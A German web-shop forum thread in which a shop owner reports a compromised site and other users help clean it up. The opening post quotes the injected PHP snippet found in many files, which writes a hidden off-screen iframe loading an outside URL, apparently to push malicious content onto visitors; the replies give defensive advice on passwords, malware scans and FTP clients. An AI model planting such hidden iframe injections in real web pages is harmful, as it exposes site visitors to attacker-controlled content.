Shop gehackt

[webster]

Hallo an alle!

Mein Shop wurde heute Nachmittag gehackt. Wenn ich die Adresse anwähle kommt eine leere Seite, die Datenbank scheint aber intakt zu sein.
In vielen Dateien sitzt folgender Codeschnipsel:

Code: PHP  [Auswählen]

<?php
#44e890#
if(empty($dzmaa)) {
$dzmaa = "<style>body {overflow-x:hidden;overflow-y:auto;} </style>
<iframe id=\"apxlp\" name=\"apxlp\" style=\"position:absolute; height: 100px; width:120px; left:5000px; top:120px;\" src=\"http://dev.estadodigital.com/clik.php\" > </iframe>
";
echo $dzmaa;
}

#/44e890#
?>

Wenn ich diesen entferne und den Shop neu lade ist er sofort wieder da.

Kann mir jemand helfen? Wir sichern jeden Tag mit MySql Dumper unsere Datenbank, aber die Dateien an sich haben wir vernachlässigt.

Vielen lieben Dank!

Linkback: https://www.modified-shop.org/forum/index.php?topic=28010.0

[noRiddle (revilonetz)]

• Alle Shopdateien herunterladen.
• Mit notepad++ oder anderem geeigneten Programm kompletten Ordner nach $dzmaa durchsuchen.
• Ebenfalls durchführen mit den SQL-Dateien der DB-Sicherung.
• Sofort alle Passworte ändern, auch die der DB (configure.php-Dateien anpassen nicht vergessen).
• Rechner mit Malwarebytes scannen.
  Hast du eine vernünftige Antivirus-Implementation auf dem Rechner ?

Welches FTP-Programm benutzt du ?
Falls Filezilla, bitte mal nach Kiosk-Mode "suchmaschinen" und diesen verwenden.

Gruß,
noRiddle

[jumpM]

Hi,

Ich hatte mal das Problem bei einem Kunden!
der o. g. Codeschnipsel ist in allen index-Dateien (sowohl HTML als auch PHP)!!!

Gruss
Robert

[fishnet]

FAQ: Hilfe, ich glaube mein Shop wurde gehackt

Lesen.
Denken.
Umsetzen.

[webster]

Danke für eure Antworten.

Ich habe all die Passwörter geändert und auch diesen Codeschnipsel aus allen Dateien entfernt. Nur wenn ich den Shop wieder starte, ist dieser Codeschnipsel sofort wieder in all diesen Dateien da. Die Datenbank ist sauber und es gibt keinen Unterschied zu der Datensicherung von gestern früh.
Es muss wohl noch eine Stelle geben, über die das ganze gesteuert ist. Weiß jemand Rat?

Ich benutze normalerweise Filezilla, wir haben aber seit längerem nichts mehr an dem Shop gemacht.

Katharina.

[fishnet]

(D)ein PC scheint immer noch verseucht zu sein und/oder du hast den Virus nicht überall entfernt.

Den eigenen PC auf Viren prüfen
Häufig wird ein Shop mit Malware durch den eigenen PC verseucht. In diesem Fall wurde nicht in den Shop eingebrochen sondern in den PC mit dem dieser gepflegt wird. Man hat also “selber” die Malware in dem Shop aufgespielt. Unverschlüsselte Passwörter bei Filezilla sind so ein Beispiel.
Der eigene PC sollte also mit verschiedenen Programmen auf Viren geprüft werden.

Quelle: FAQ: Hilfe, ich glaube mein Shop wurde gehackt

[mooncrawler]

Es könnte an FileZilla liegen. Lade es mal mit einem anderen FTP Programm hoch (vorher FTP Zugangsdaten ändern). Dein PC ist bestimmt "infiziert". FileZilla speichert die Passwörter in Klartext ab, somit lassen sich die Zugangsdaten an dritte weitergeben. Hatte sowas auch mal vor ein paar Jahren, der Zugang wurde an einen Server geschickt, später griff ein Client per FTP auf den Server zu und änderte alle index.php / index.html Daten. Alle "neuen" Dateien hatten am ende ein PHP Codeschnipsel.

[webster]

Danke an alle! Mit einem anderen FTP Client habe ich alles bereinigen können.

[jumpM]

Hallo,

am besten mal nach "combofix" googlen, oder hier herunterladen (kostenlos)

http://www.bleepingcomputer.com/download/combofix/!

Der eleminiert den Trojaner sicher  !! Am besten Filezilla gleich mit eleminieren 
Also erst den lokalen Rechner und dann die Dateien die Du uploaden willst!

Gruss
Robert

[jumpM]

oops..........

war ich zu langsam...........

Robert